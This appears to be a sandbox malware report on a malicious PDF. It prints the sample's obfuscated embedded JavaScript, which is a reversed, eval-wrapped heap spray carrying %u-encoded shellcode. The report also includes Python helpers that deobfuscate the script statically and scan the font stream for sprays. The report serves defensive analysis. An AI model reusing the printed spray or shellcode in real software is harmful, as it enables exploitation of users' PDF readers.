Verdict: MALICIOUS (risk score 88)

Malware Insights

MITRE ATT&CK
- T1059.007 JavaScript (the carved payload is PDF-embedded JavaScript; nothing in this report involves PowerShell)
- T1204.002 Malicious File
The PDF carries embedded JavaScript (PDF_JAVASCRIPT and PDF_JS heuristics), carved as javascript_obj0012_000.js from /JS object 12. The script does not reach out to a URL. It stores its real code as a mirrored string literal, reverses it at runtime and hands it to eval through a Function constructor, so plain string matching sees only the reversed text. Read backwards, the preview below is a series of unescape() calls: one builds a %u-encoded payload, another the filler %u0c0c%u0c0c; the filler is doubled until it nears 64 K characters, the payload is placed at an offset derived from 0x0c0c, the block is padded to 0x80000 characters and 0x1f0 copies are stored in an array. That is a heap spray of the kind aimed at the 0x0c0c0c0c address range, with the payload seated inside every block. The embedded URL http://www.bitstream.com was extracted from the document text, not from the script, and the analyzer lists it as informational only, so the earlier "download second stage" reading is not supported by this report. The ASCIIHexDecode filter alongside these indicators (PDF_FILTER_HEX) is consistent with hex-hiding payload bytes inside the PDF structure, and the embedded sfnt font stream separately shows a 0x41 (A) heap-spray pattern. One caveat for analysts: the preview shows spaces inside several %u tokens (for example "c 0c 0"); the report does not say whether those are in the file or introduced by the viewer, so verify against the carved artifact by its SHA-256 before reasoning about the exact byte sequence.
Machine Learning
- Nyx PDF Classifier: malicious score 0.9997

Heuristics (5)
- ASCIIHexDecode filter (with exploit indicators) [medium, PDF_FILTER_HEX]: hex-encoding filter present alongside exploit delivery indicators; often used to hide payload or shellcode bytes.
- Suspicious extracted artifact [medium, EXTRACTED_FILE_STATIC_TRIAGE]: one or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- JavaScript action [low, PDF_JAVASCRIPT, 1 related finding]: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Embedded JS stream [low, PDF_JS]: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Embedded URL [info, EMBEDDED_URL]: one or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label states which channel (macro, JS, link annotation, document body, ...) reached it. URL: http://www.bitstream.com, found in PDF document text (not in the carved script).
Extracted artifacts (2)
Files carved from inside the sample during analysis.

Artifact 1: javascript_obj0012_000.js

| Field | Value |
|---|---|
| Kind | pdf-javascript-stream |
| Source | PDF /JS object 12 at offset 0x104F0 |
| Size | 3724 bytes |
| SHA-256 | 78bab42ea050c9d2a12931eade2d98c996aa7c4040b068f89e657a45642a0857 |
| ClamAV | No threats found |
| Obfuscation or payload | likely: carved artifact contains 1 eval/decoder/string-building token(s) |

Preview (first 1,000 lines of the extracted script):
var eva=new Function("a","ev al (a);".split("").join(""));
var s='
;"s"+dD=]M[nBR )++M;0f1x0<M;0=M( rof ;)(yarrA wen = nBR rav ;)2 / )80x0-0201x0( - 00008x0 ,0(gnirtsbus.Sklja = dD ;Sklja =+ Sklja )00008x0 < htgnel.Sklja(elihw ;)2/63556 ,0(gnirtsbus.VMUrM = Sklja ;Ri =+ VMUrM ;ew =+ VMUrM ;)2/)42x0-c0c0x0( ,0(gnirtsbus.Ri = VMUrM ;Ri=+Ri )63556 < 8 + 02 + htgnel.Ri( elihw ;) "c" + "0" + "c" + "0" + "u%" + "c" + "0" + "c" + "0" + "u" + "%" (ssaU = Ri rav ;) 'bb14 u % ca26 u % 2ae8 u % 407c u % b4be u % 69b1 u % 8246 u % 6990 u % 607b u % 58b5 u % ae5c u % 8bbd u % e90c u % b33c u % b683 u % 2004 u % cbaf u % e5fb u % 427a u % 6b6d u % 56d8 u % 93c9 u % ea8a u % e330 u % 5272 u % 5523 u % a170 u % 5582 u % f1e3 u % 2889 u % d305 u % 65e9 u % 532b u % 9eb3 u % 52ac u % 6020 u % c7e6 u % c5b1 u % 8552 u % 60c3 u % 77ca u % d89b u % bf09 u % a045 u % 39c8 u % dbe1 u % 0de7 u % 8674 u % 3ff7 u % a9fd u % ee7d u % c3a4 u % 514a u % 1894 u % dd75 u % e5a3 u % 99f6 u % 3522 u % 6ae5 u % b6d6 u % 54f6 u % 9bc1 u % dac6 u % c87a u % 0552 u % f53b u % 0641 u % 3dbe u % 62ce u % a7c5 u % 42cb u % d85e u % 10a7 u % dad9 u % dcde u % d6c9 u % 8bfa u % ebb6 u % fe0a u % d493 u % 6acb u % 8383 u % 6937 u % be7d u % ae96 u % 725b u % 225a u % 6907 u % 3fa8 u % d15b u % bd56 u % 687b u % 57d4 u % 56c3 u % dff1 u % 438e u % 68a4 u % 50ab u % f0fa u % 4f9d u % cef4 u % 81c8 u % 3033 u % aecf u % e038 u % 1324 u % 4fa5 u % 4742 u % ec9d u % 339d u % 9c1b u % 9113 u % 21e6 u % 8b17 u % 0070 u % f211 u % 0070 u % 137d u % 0070 u % d451 u % ff09 u % ffff u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % 0909 u % 0909 u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % 0909 u % 0909 u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % 0909 u % ff09 u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % ffff u % 8e6e u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % be50 u % 57ee u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % c 0c 0 u % c 0c 0 u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % 18bf u % 2c40 u 
% 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % 4038 u % 380c u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % 9881 u % b8a1 u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % 5185 u % a5be u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % 4509 u % a509 u % 0070 u % bb51 u % 0070 u % 137d u % 0000 u % 0400 u % 0000 u % 0001 u % 1000 u % 4010 u % 0000 u % 0000 u % 1000 u % 0010 u % ffff u % ffff u % 0070 u % 45c5 u % 0070 u % 2e25 u % 1000 u % 1100 u % 0070 u % 7f27 u % 0070 u % ca8a u % 1000 u % 0010 u % 0070 u % bb51 u % 0070 u % ca8a u % 1000 u % 1100 u % 0070 u % bb51 u % 0070 u % 2bf7 u % eff7 u % 0030 u % 0070 u % bb51 u % 0070 u % d451 u % 0000 u % 0001 u % 0070 u % bb51 u % 1000 u % 4010 u % 0070 u % 7f27 u % 1000 u % 4210 u % 0070 u % 9951 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % c 0c 0 u % c 0c 0 u % 0070 u % 4809 u % 0070 u % 3309 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % cccc u % cccc u % 0070 u % f651 u % 0070 u % fe84 u % cccc u % cccc u % 0070 u % 9194 u % c 0c 0 u % c 0c 0 u % ' (ssaU = ew rav ;epacsenu = ssaU rav
';
eva(s.split("").reverse().join(""));
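The preview above cannot be read as it stands: the real code is stored mirrored and only becomes JavaScript inside eval. The script below is an editor's added example, not part of the analyzer or of the sample, and shows how to do that unwrapping statically without executing anything: pull the reversed literal, reverse it, emulate unescape("%uXXXX") to recover the little-endian bytes the sprayed string has in memory, separate the single-dword filler from the code-like payload, and read the block size and block count out of the padding loop. SAMPLE_JS is a constructed input that copies the structure of the preview with a dummy payload; it is not the sample's bytes, and the regular expressions assume the shapes seen in the preview (`var s='...'`, `var X = unescape;`, `while (X.length < N)`, `for (M=0;M<N;M++)`).

```python
import re
import struct

# Constructed stand-in for the carved javascript_obj0012_000.js (constructed
# test input, NOT bytes from the sample). It keeps the same layering as the
# preview: the real code is stored as a reversed string literal, reversed at
# runtime and handed to eval through a Function constructor; the decoded code
# unescape()s a %u-encoded payload and a %u0c0c filler, pads blocks to 0x80000
# characters and stores 0x1f0 of them. The payload here is a short dummy.
_INNER = (
    "var Uass = unescape; "
    'var we = Uass("%u9090%u9090%ue8fc%u0000"); '
    'var iR = Uass("%u0c0c%u0c0c"); '
    "while (iR.length + 20 + 8 < 65536) iR += iR; "
    "var MrUMV = iR.substring(0, (0x0c0c-0x24)/2); MrUMV += we; MrUMV += iR; "
    "var ajlkS = MrUMV.substring(0, 65536/2); "
    "while (ajlkS.length < 0x80000) ajlkS += ajlkS; "
    "var Dd = ajlkS.substring(0, 0x80000 - (0x1020-0x08)/2); "
    'var RBn = new Array(); for (M=0;M<0x1f0;M++) RBn[M] = Dd + "s";'
)
SAMPLE_JS = (
    'var eva=new Function("a","eval(a);");\n'
    "var s='" + _INNER[::-1] + "';\n"
    'eva(s.split("").reverse().join(""));\n'
)

# Shapes assumed from the preview; adjust for other samples.
LITERAL_RE = re.compile(r"var\s+s\s*=\s*'(.*?)'\s*;", re.S)
ALIAS_RE = re.compile(r"var\s+(\w+)\s*=\s*unescape\s*;")
FOR_RE = re.compile(r"for\s*\(\s*\w+\s*=\s*0\s*;\s*\w+\s*<\s*(0x[0-9a-fA-F]+|\d+)")
WHILE_RE = re.compile(r"while\s*\(\s*\w+\.length\s*<\s*(0x[0-9a-fA-F]+|\d+)\s*\)")


def extract_reversed_literal(js: str) -> str:
    """Pull the literal assigned to `s` and undo the character reversal,
    without ever evaluating the script."""
    m = LITERAL_RE.search(js)
    if not m:
        raise ValueError("no reversed literal assigned to s")
    return m.group(1)[::-1]


def unescape_u(payload: str) -> bytes:
    """Emulate JavaScript unescape() on %uXXXX sequences: each is one UTF-16
    code unit, and the string sits in memory as little-endian 16-bit units,
    which is the byte order a sprayed payload has when it executes."""
    units = re.findall(r"%u([0-9a-fA-F]{4})", payload)
    return b"".join(struct.pack("<H", int(u, 16)) for u in units)


def is_repeated_dword(b: bytes) -> bool:
    """True when the payload is one 4-byte value repeated: a filler or sled,
    not code."""
    return len(b) >= 4 and len(b) % 4 == 0 and b == b[:4] * (len(b) // 4)


def analyse(js: str) -> dict:
    code = extract_reversed_literal(js)
    names = ["unescape"] + ALIAS_RE.findall(code)  # unescape and its aliases
    payloads = []
    for name in names:
        pat = re.compile(re.escape(name) + r"""\s*\(\s*(["'])((?:%u[0-9a-fA-F]{4})+)\1\s*\)""")
        payloads += [unescape_u(lit) for _, lit in pat.findall(code)]
    fillers = [p for p in payloads if is_repeated_dword(p)]
    code_like = [p for p in payloads if not is_repeated_dword(p)]
    m_for, m_while = FOR_RE.search(code), WHILE_RE.search(code)
    block_count = int(m_for.group(1), 0) if m_for else None
    block_chars = int(m_while.group(1), 0) if m_while else None
    return {
        "decoded": code,
        "filler_dword": struct.unpack("<I", fillers[0][:4])[0] if fillers else None,
        "shellcode": max(code_like, key=len) if code_like else None,
        "block_count": block_count,
        "block_chars": block_chars,
        # UTF-16 string: two bytes per character
        "spray_bytes": block_count * block_chars * 2 if block_count and block_chars else None,
    }


if __name__ == "__main__":
    r = analyse(SAMPLE_JS)
    print(r["decoded"])
    print("filler 0x%08x, %d blocks x %d chars (~%d MiB), payload %s" % (
        r["filler_dword"], r["block_count"], r["block_chars"],
        r["spray_bytes"] // (1 << 20), r["shellcode"].hex()))
```

The point of doing this statically is that the `eva` wrapper is never called: the deobfuscator treats the script as text. On the constructed input it reports a 0x0c0c0c0c filler and 0x1f0 blocks of 0x80000 UTF-16 characters, which at two bytes per character is roughly 496 MiB of spray; the same two constants appear in the real preview, so this is the size an analyst should expect that sample to try to allocate.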
Artifact 2: font_00_sfnt_off00000319.bin

| Field | Value |
|---|---|
| Kind | pdf-font-stream |
| Source | PDF embedded font (sfnt) at offset 0x319 |
| Size | 65932 bytes |
| SHA-256 | 67cf5b115c479e7cc69ef02607414d718125a1e117a59d537db3e97682d5b723 |
| ClamAV | No threats found |
| Obfuscation or payload | likely: static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A) |

The indicator here is a long run of 0x41 inside a 64 KB font stream. The report does not give the offset or length of the candidate region, so confirm it against the carved bytes before treating the font as the spray carrier rather than, for example, padding in a table.
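Since the report names the 0x41 pattern but not where it sits, the scanner below is the check a practitioner would run over the carved font bytes. It is an added example, not the analyzer's own logic: it reports long runs of a single byte (0x41, 0x90, 0x0c sleds) and runs of one repeated little-endian dword at any alignment, each with its offset, so the finding can be located and told apart from ordinary padding. SAMPLE_FONT is constructed data and is not font_00_sfnt_off00000319.bin; the thresholds (256 bytes, 64 repeats, 0x1000 bytes for the verdict) are tuning assumptions.

```python
import struct

# Constructed stand-in for a carved font stream (constructed test input, NOT
# the bytes of font_00_sfnt_off00000319.bin): an sfnt version tag, some
# non-repeating bytes, then a 16 KiB run of 0x41 ('A') and a 300-repeat run
# of one little-endian dword, the two shapes a spray leaves behind.
SAMPLE_FONT = (
    bytes.fromhex("00010000")
    + bytes(range(256)) * 4
    + b"A" * 0x4000
    + struct.pack("<I", 0x0A0B0C0D) * 300
    + bytes(range(255, -1, -1)) * 2
)


def byte_runs(data: bytes, min_len: int = 256):
    """Return (offset, length, value) for every run of one repeated byte of
    at least min_len bytes (0x41 / 0x90 / 0x0c sleds and fillers)."""
    runs, i, n = [], 0, len(data)
    while i < n:
        j = i
        while j < n and data[j] == data[i]:
            j += 1
        if j - i >= min_len:
            runs.append((i, j - i, data[i]))
        i = j
    return runs


def dword_runs(data: bytes, min_repeats: int = 64):
    """Return (offset, repeats, value) for a 4-byte value repeated back to
    back at any alignment (gadget addresses, multi-byte fillers). Values made
    of one byte are skipped because byte_runs already reports them."""
    runs, i, n = [], 0, len(data)
    while i + 8 <= n:
        if data[i:i + 4] == data[i + 4:i + 8]:
            j = i
            while j + 8 <= n and data[j:j + 4] == data[j + 4:j + 8]:
                j += 4
            repeats = (j - i) // 4 + 1
            chunk = data[i:i + 4]
            if repeats >= min_repeats and chunk != chunk[:1] * 4:
                runs.append((i, repeats, struct.unpack("<I", chunk)[0]))
            i = j + 4
        else:
            i += 1
    return runs


def scan(data: bytes) -> dict:
    """Static spray/sled triage of an opaque blob such as a font stream."""
    b, d = byte_runs(data), dword_runs(data)
    return {
        "byte_runs": b,
        "dword_runs": d,
        # 0x1000 bytes of one value, or any repeated-dword run, is suspicious
        "spray_like": any(ln >= 0x1000 for _, ln, _ in b) or bool(d),
    }


if __name__ == "__main__":
    r = scan(SAMPLE_FONT)
    for off, ln, v in r["byte_runs"]:
        print("byte run  0x%06x: %d x 0x%02x" % (off, ln, v))
    for off, rep, v in r["dword_runs"]:
        print("dword run 0x%06x: %d x 0x%08x" % (off, rep, v))
    print("spray-like:", r["spray_like"])
```

Run against the carved file (`scan(open(path, "rb").read())`), the offsets let you check whether the 0x41 region lies inside a real glyph or table area or simply tails the font, and the dword scan catches sprays that avoid single-byte fillers.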